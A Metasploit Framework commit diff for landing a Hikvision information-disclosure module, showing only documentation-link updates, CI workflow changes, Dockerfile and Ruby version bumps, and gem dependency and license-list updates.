automatic module_metadata_base.json update

Land #17098 , Hikvision camera unauthenticated information disclosure
2022-10-20 10:01:43 -05:00 · 2022-10-20 16:20:12 +02:00 · 2022-10-20 08:32:36 -05:00 · 2022-10-20 15:10:42 +02:00 · 2022-10-20 14:33:40 +02:00 · 2022-10-20 11:02:35 +01:00
648 changed files with 46243 additions and 12427 deletions
@@ -8,8 +8,8 @@ labels: "bug"
  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
-  - Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
+  - Wiki: https://docs.metasploit.com/
+  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html

  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-docs"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -33,7 +33,7 @@ Why should we document this and who will benefit from it?
 ### Draft the doc

 - [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
  - [Example of a similar article]()

@@ -8,7 +8,7 @@ labels: "suggestion-feature"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-module"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "question"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -31,4 +31,4 @@ Complex Software Examples:
 We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

 Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
+If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
@@ -31,7 +31,7 @@ on:
 jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
@@ -43,7 +43,7 @@ jobs:
    name: Ruby ${{ matrix.ruby }}
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
@@ -28,7 +28,7 @@ jobs:
  handle-labels:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/github-script@v3
+      - uses: actions/github-script@v6
        with:
          github-token: ${{secrets.GITHUB_TOKEN}}
          script: |
@@ -172,7 +172,7 @@ jobs:

                    This includes:

-                    - All of the item points within this [tempate](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
+                    - All of the item points within this [template](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
                    - The result of the \`debug\` command in your Metasploit console
                    - Screenshots showing the issues you're having
                    - Exact replication steps
@@ -202,16 +202,16 @@ jobs:

            if (config.comment) {
              const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
-              const commentWithoutPreceedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.issues.createComment({
+              const commentWithoutPrecedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
+              await github.rest.issues.createComment({
                issue_number: context.issue.number,
                owner: context.repo.owner,
                repo: context.repo.repo,
-                body: commentWithoutPreceedingWhitespace
+                body: commentWithoutPrecedingWhitespace
              });
            }
            if (config.close) {
-              await github.issues.update({
+              await github.rest.issues.update({
                  issue_number: context.issue.number,
                  owner: context.repo.owner,
                  repo: context.repo.repo,
@@ -28,14 +28,14 @@ on:

 jobs:
  msftidy:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40

    strategy:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
+          - 2.7

    name: Lint msftidy
    steps:
@@ -43,7 +43,7 @@ jobs:
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3
        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
        with:
@@ -28,12 +28,12 @@ on:

 jobs:
  build:
-    runs-on: ubuntu-18.04
+    runs-on: ubuntu-latest
    timeout-minutes: 40
    name: Docker Build
    steps:
      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: docker-compose build
        run: |
@@ -44,7 +44,7 @@ jobs:
          /usr/bin/docker-compose build

  test:
-    runs-on: ubuntu-18.04
+    runs-on: ${{ matrix.os }}
    timeout-minutes: 40

    services:
@@ -64,10 +64,19 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - 2.6
          - 2.7
-          - 3.0.3
-          - 3.1.1
+          - 3.0
+          - 3.1
+        os:
+          - ubuntu-20.04
+          - ubuntu-latest
+        exclude:
+          - { os: ubuntu-latest, ruby: 2.7 }
+          - { os: ubuntu-latest, ruby: 3.0 }
+        include:
+          - os: ubuntu-latest
+            ruby: 3.1
+            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
        test_cmd:
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
@@ -78,13 +87,13 @@ jobs:
    env:
      RAILS_ENV: test

-    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
        run: sudo apt-get install libpcap-dev graphviz

      - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v3

      - name: Setup Ruby
        env:
@@ -3,6 +3,8 @@ Gemfile.local
 Gemfile.local.lock
 # Rubymine project directory
 .idea
+# Visual Studio Code configuration settings directory
+.vscode
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
@@ -1,4 +1,4 @@
-FROM ruby:3.0.2-alpine3.12 AS builder
+FROM ruby:3.0.4-alpine3.15 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -40,6 +40,7 @@ RUN apk add --no-cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle

+ENV GO111MODULE=off
 RUN mkdir -p $TOOLS_HOME/bin && \
    cd $TOOLS_HOME/bin && \
    curl -O https://dl.google.com/go/go1.11.2.src.tar.gz && \
@@ -48,7 +49,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.0.2-alpine3.12
+FROM ruby:3.0.4-alpine3.15
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -59,7 +60,9 @@ ENV METASPLOIT_GROUP=metasploit
 # used for the copy command
 RUN addgroup -S $METASPLOIT_GROUP

-RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk python2-dev openssl-dev nasm mingw-w64-gcc
+RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
+    postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
+    python2-dev openssl-dev nasm mingw-w64-gcc

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -15,7 +15,11 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry-byebug'
+  # lock to version with 2.6 support until project updates
+  gem 'pry-byebug', '~> 3.9.0'
+  # Ruby Debugging Library - rebuilt and included by default from Ruby 3.1 onwards.
+  # Replaces the old lib/debug.rb and provides more features.
+  gem 'debug', '>= 1.0.0'
  # module documentation
  gem 'octokit'
  # memory profiling
@@ -24,7 +28,7 @@ group :development do
  gem 'ruby-prof', '1.4.2'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  # gem 'metasploit-aggregator'
 end

 group :development, :test do
@@ -45,4 +49,3 @@ group :test do
  # Manipulate Time.now in specs
  gem 'timecop'
 end
-
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.2)
+    metasploit-framework (6.2.23)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -30,9 +30,9 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.93)
+      metasploit-payloads (= 2.0.97)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.18)
+      metasploit_payloads-mettle (= 1.0.20)
      mqtt
      msgpack
      nessus_rest
@@ -42,7 +42,7 @@ PATH
      network_interface
      nexpose
      nokogiri
-      octokit
+      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
      packetfu
@@ -55,7 +55,6 @@ PATH
      rb-readline
      recog
      redcarpet
-      reline (= 0.2.5)
      rex-arch
      rex-bin_tools
      rex-core
@@ -75,7 +74,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
-      ruby_smb (~> 3.1.0)
+      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
      sinatra
@@ -98,57 +97,57 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.1.0)
-    actionpack (6.1.6)
-      actionview (= 6.1.6)
-      activesupport (= 6.1.6)
+    actionpack (6.1.7)
+      actionview (= 6.1.7)
+      activesupport (= 6.1.7)
      rack (~> 2.0, >= 2.0.9)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (6.1.6)
-      activesupport (= 6.1.6)
+    actionview (6.1.7)
+      activesupport (= 6.1.7)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (6.1.6)
-      activesupport (= 6.1.6)
-    activerecord (6.1.6)
-      activemodel (= 6.1.6)
-      activesupport (= 6.1.6)
-    activesupport (6.1.6)
+    activemodel (6.1.7)
+      activesupport (= 6.1.7)
+    activerecord (6.1.7)
+      activemodel (= 6.1.7)
+      activesupport (= 6.1.7)
+    activesupport (6.1.7)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
      zeitwerk (~> 2.3)
-    addressable (2.8.0)
-      public_suffix (>= 2.0.2, < 5.0)
+    addressable (2.8.1)
+      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.595.0)
-    aws-sdk-core (3.131.1)
+    aws-partitions (1.628.0)
+    aws-sdk-core (3.145.0)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.525.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.317.0)
+    aws-sdk-ec2 (1.331.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.68.0)
+    aws-sdk-iam (1.70.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.57.0)
+    aws-sdk-kms (1.58.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-s3 (1.114.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.4)
-    aws-sigv4 (1.5.0)
+    aws-sigv4 (1.5.1)
      aws-eventstream (~> 1, >= 1.0.2)
    bcrypt (3.1.18)
    bcrypt_pbkdf (1.1.0)
@@ -161,6 +160,9 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
+    debug (1.6.2)
+      irb (>= 1.3.6)
+      reline (>= 0.3.1)
    diff-lcs (1.5.0)
    digest (3.1.0)
    dnsruby (1.61.9)
@@ -177,20 +179,21 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.10.0)
+    erubi (1.11.0)
    eventmachine (1.2.7)
    factory_bot (6.2.1)
      activesupport (>= 5.0.0)
    factory_bot_rails (6.2.0)
      factory_bot (~> 6.2.0)
      railties (>= 5.0.0)
-    faker (2.21.0)
+    faker (2.23.0)
      i18n (>= 1.8.11, < 2)
-    faraday (2.3.0)
-      faraday-net_http (~> 2.0)
+    faraday (2.5.2)
+      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
-    faraday-net_http (2.0.3)
-    faraday-retry (1.0.3)
+    faraday-net_http (3.0.0)
+    faraday-retry (2.0.0)
+      faraday (~> 2.0)
    faye-websocket (0.11.1)
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
@@ -211,11 +214,11 @@ GEM
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.10.0)
+    i18n (1.12.0)
      concurrent-ruby (~> 1.0)
    io-console (0.5.11)
-    irb (1.3.6)
-      reline (>= 0.2.5)
+    irb (1.4.1)
+      reline (>= 0.3.0)
    jmespath (1.6.1)
    jsobfu (0.4.2)
      rkelly-remix
@@ -229,11 +232,11 @@ GEM
      nokogiri (>= 1.5.9)
    memory_profiler (1.0.0)
    metasm (1.0.5)
-    metasploit-concern (4.0.4)
+    metasploit-concern (4.0.5)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-credential (5.0.7)
+    metasploit-credential (5.0.9)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -243,11 +246,11 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (4.0.4)
+    metasploit-model (4.0.6)
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.93)
+    metasploit-payloads (2.0.97)
    metasploit_data_models (5.0.5)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -258,41 +261,41 @@ GEM
      railties (~> 6.0)
      recog (~> 2.0)
      webrick
-    metasploit_payloads-mettle (1.0.18)
+    metasploit_payloads-mettle (1.0.20)
    method_source (1.0.0)
    mini_portile2 (2.8.0)
-    minitest (5.15.0)
+    minitest (5.16.3)
    mqtt (0.5.0)
-    msgpack (1.5.2)
+    msgpack (1.5.6)
    multi_json (1.15.0)
-    mustermann (1.1.1)
+    mustermann (2.0.2)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.17.0)
+    net-ldap (0.17.1)
    net-protocol (0.1.3)
      timeout
    net-smtp (0.3.1)
      digest
      net-protocol
      timeout
-    net-ssh (6.1.0)
+    net-ssh (7.0.1)
    network_interface (0.0.2)
    nexpose (7.3.0)
    nio4r (2.5.8)
-    nokogiri (1.13.6)
+    nokogiri (1.13.8)
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
-    octokit (4.23.0)
+    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
-    openssl-ccm (1.2.2)
-    openssl-cmac (2.0.1)
+    openssl-ccm (1.2.3)
+    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
    parallel (1.22.1)
-    parser (3.1.2.0)
+    parser (3.1.2.1)
      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.1)
@@ -302,30 +305,30 @@ GEM
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.3.5)
+    pg (1.4.3)
    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.7)
-    puma (5.6.4)
+    public_suffix (5.0.0)
+    puma (5.6.5)
      nio4r (~> 2.0)
    racc (1.6.0)
-    rack (2.2.3.1)
-    rack-protection (2.2.0)
+    rack (2.2.4)
+    rack-protection (2.2.2)
      rack
-    rack-test (1.1.0)
-      rack (>= 1.0, < 3)
+    rack-test (2.0.2)
+      rack (>= 1.3)
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.2)
+    rails-html-sanitizer (1.4.3)
      loofah (~> 2.3)
-    railties (6.1.6)
-      actionpack (= 6.1.6)
-      activesupport (= 6.1.6)
+    railties (6.1.7)
+      actionpack (= 6.1.7)
+      activesupport (= 6.1.7)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
@@ -336,7 +339,7 @@ GEM
      nokogiri
    redcarpet (3.5.1)
    regexp_parser (2.5.0)
-    reline (0.2.5)
+    reline (0.3.1)
      io-console (~> 0.5)
    rex-arch (0.1.14)
      rex-text
@@ -351,7 +354,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.30)
+    rex-exploitation (0.1.36)
      jsobfu
      metasm
      rex-arch
@@ -365,25 +368,25 @@ GEM
      rex-arch
    rex-ole (0.1.7)
      rex-text
-    rex-powershell (0.1.96)
+    rex-powershell (0.1.97)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.8)
+    rex-random_identifier (0.1.9)
      rex-text
    rex-registry (0.1.4)
    rex-rop_builder (0.1.4)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.39)
+    rex-socket (0.1.43)
      rex-core
-    rex-sslscan (0.1.7)
+    rex-sslscan (0.1.8)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.45)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -394,7 +397,7 @@ GEM
      rspec-mocks (~> 3.11.0)
    rspec-core (3.11.0)
      rspec-support (~> 3.11.0)
-    rspec-expectations (3.11.0)
+    rspec-expectations (3.11.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.11.0)
    rspec-mocks (3.11.1)
@@ -410,24 +413,25 @@ GEM
      rspec-support (~> 3.10)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.11.0)
-    rubocop (1.30.0)
+    rspec-support (3.11.1)
+    rubocop (1.36.0)
+      json (~> 2.3)
      parallel (~> 1.10)
-      parser (>= 3.1.0.0)
+      parser (>= 3.1.2.1)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.18.0, < 2.0)
+      rubocop-ast (>= 1.20.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 1.4.0, < 3.0)
-    rubocop-ast (1.18.0)
+    rubocop-ast (1.21.0)
      parser (>= 3.1.1.0)
    ruby-macho (3.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.2.0)
      bindata
      openssl-ccm
      openssl-cmac
@@ -435,7 +439,7 @@ GEM
      windows_error (>= 0.1.4)
    rubyntlm (0.6.3)
    rubyzip (2.3.2)
-    sawyer (0.9.1)
+    sawyer (0.9.2)
      addressable (>= 2.3.5)
      faraday (>= 0.17.3, < 3)
    simplecov (0.18.2)
@@ -444,12 +448,13 @@ GEM
    simplecov-html (0.12.3)
    simpleidn (0.2.1)
      unf (~> 0.1.4)
-    sinatra (2.2.0)
-      mustermann (~> 1.0)
+    sinatra (2.2.2)
+      mustermann (~> 2.0)
      rack (~> 2.2)
-      rack-protection (= 2.2.0)
+      rack-protection (= 2.2.2)
      tilt (~> 2.0)
-    sqlite3 (1.4.2)
+    sqlite3 (1.5.0)
+      mini_portile2 (~> 2.8.0)
    sshkey (2.0.0)
    swagger-blocks (3.0.0)
    thin (1.8.1)
@@ -457,18 +462,18 @@ GEM
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.2.1)
-    tilt (2.0.10)
+    tilt (2.0.11)
    timecop (0.9.5)
    timeout (0.3.0)
    ttfunk (1.7.0)
-    tzinfo (2.0.4)
+    tzinfo (2.0.5)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2022.1)
+    tzinfo-data (1.2022.3)
      tzinfo (>= 1.0.0)
    unf (0.1.4)
      unf_ext
    unf_ext (0.0.8.2)
-    unicode-display_width (2.1.0)
+    unicode-display_width (2.2.0)
    unix-crypt (1.3.0)
    warden (1.2.9)
      rack (>= 2.0.9)
@@ -494,18 +499,19 @@ GEM
      webrick
    yard (0.9.28)
      webrick (~> 1.7.0)
-    zeitwerk (2.5.4)
+    zeitwerk (2.6.0)

 PLATFORMS
  ruby

 DEPENDENCIES
+  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
  memory_profiler
  metasploit-framework!
  octokit
-  pry-byebug
+  pry-byebug (~> 3.9.0)
  rake
  redcarpet
  rspec-rails
@@ -15,6 +15,10 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #

+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0
+
 Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
@@ -1,22 +1,22 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.6, MIT
-actionview, 6.1.6, MIT
-activemodel, 6.1.6, MIT
-activerecord, 6.1.6, MIT
-activesupport, 6.1.6, MIT
-addressable, 2.8.0, "Apache 2.0"
+actionpack, 6.1.7, MIT
+actionview, 6.1.7, MIT
+activemodel, 6.1.7, MIT
+activerecord, 6.1.7, MIT
+activesupport, 6.1.7, MIT
+addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.588.0, "Apache 2.0"
-aws-sdk-core, 3.131.0, "Apache 2.0"
-aws-sdk-ec2, 1.315.0, "Apache 2.0"
-aws-sdk-iam, 1.68.0, "Apache 2.0"
-aws-sdk-kms, 1.57.0, "Apache 2.0"
+aws-partitions, 1.628.0, "Apache 2.0"
+aws-sdk-core, 3.145.0, "Apache 2.0"
+aws-sdk-ec2, 1.331.0, "Apache 2.0"
+aws-sdk-iam, 1.70.0, "Apache 2.0"
+aws-sdk-kms, 1.58.0, "Apache 2.0"
 aws-sdk-s3, 1.114.0, "Apache 2.0"
-aws-sigv4, 1.5.0, "Apache 2.0"
+aws-sigv4, 1.5.1, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
 bindata, 2.4.10, ruby
@@ -29,6 +29,7 @@ concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+debug, 1.6.2, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 digest, 3.1.0, "ruby, Simplified BSD"
 dnsruby, 1.61.9, "Apache 2.0"
@@ -37,22 +38,14 @@ domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.10.0, MIT
+erubi, 1.11.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.21.0, MIT
-faraday, 1.10.0, MIT
-faraday-em_http, 1.0.0, MIT
-faraday-em_synchrony, 1.0.0, MIT
-faraday-excon, 1.1.0, MIT
-faraday-httpclient, 1.0.1, MIT
-faraday-multipart, 1.0.3, MIT
-faraday-net_http, 1.0.1, MIT
-faraday-net_http_persistent, 1.2.0, MIT
-faraday-patron, 1.0.0, MIT
-faraday-rack, 1.0.0, MIT
-faraday-retry, 1.0.3, MIT
+faker, 2.23.0, MIT
+faraday, 2.5.2, MIT
+faraday-net_http, 3.0.0, MIT
+faraday-retry, 2.0.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -62,130 +55,129 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.4, MIT
+http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
-i18n, 1.10.0, MIT
+i18n, 1.12.0, MIT
 io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.3.6, "ruby, Simplified BSD"
+irb, 1.4.1, "ruby, Simplified BSD"
 jmespath, 1.6.1, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.2, ruby
 little-plugger, 1.1.4, MIT
-logging, 2.3.0, MIT
+logging, 2.3.1, MIT
 loofah, 2.18.0, MIT
 memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.4, "New BSD"
-metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.2, "New BSD"
-metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.87, "3-clause (or ""modified"") BSD"
+metasploit-concern, 4.0.5, "New BSD"
+metasploit-credential, 5.0.9, "New BSD"
+metasploit-framework, 6.2.23, "New BSD"
+metasploit-model, 4.0.6, "New BSD"
+metasploit-payloads, 2.0.97, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
-metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
-minitest, 5.15.0, MIT
+minitest, 5.16.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.5.1, "Apache 2.0"
+msgpack, 1.5.6, "Apache 2.0"
 multi_json, 1.15.0, MIT
-multipart-post, 2.1.1, MIT
-mustermann, 1.1.1, MIT
+mustermann, 2.0.2, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.0, MIT
+net-ldap, 0.17.1, MIT
 net-protocol, 0.1.3, "ruby, Simplified BSD"
 net-smtp, 0.3.1, "ruby, Simplified BSD"
-net-ssh, 6.1.0, MIT
+net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.6, MIT
+nokogiri, 1.13.8, MIT
 nori, 2.6.0, MIT
-octokit, 4.22.0, MIT
-openssl-ccm, 1.2.2, MIT
-openssl-cmac, 2.0.1, MIT
+octokit, 4.25.1, MIT
+openssl-ccm, 1.2.3, MIT
+openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.2.0, MIT
+parser, 3.1.2.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.10.0, MIT
-pg, 1.3.5, "Simplified BSD"
+pg, 1.4.3, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.7, MIT
-puma, 5.6.4, "New BSD"
+public_suffix, 5.0.0, MIT
+puma, 5.6.5, "New BSD"
